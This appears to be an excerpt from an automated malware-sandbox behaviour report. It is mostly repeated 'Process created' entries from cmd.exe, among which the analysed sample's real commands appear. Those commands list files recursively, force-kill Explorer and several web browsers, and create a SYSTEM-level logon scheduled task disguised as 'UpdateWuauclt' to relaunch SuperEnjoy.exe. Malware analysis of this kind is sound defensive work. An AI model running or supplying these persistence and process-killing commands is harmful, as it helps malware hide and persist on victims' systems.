Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' dir * /a-D /s /b 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /I /V /C:'^$'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exe
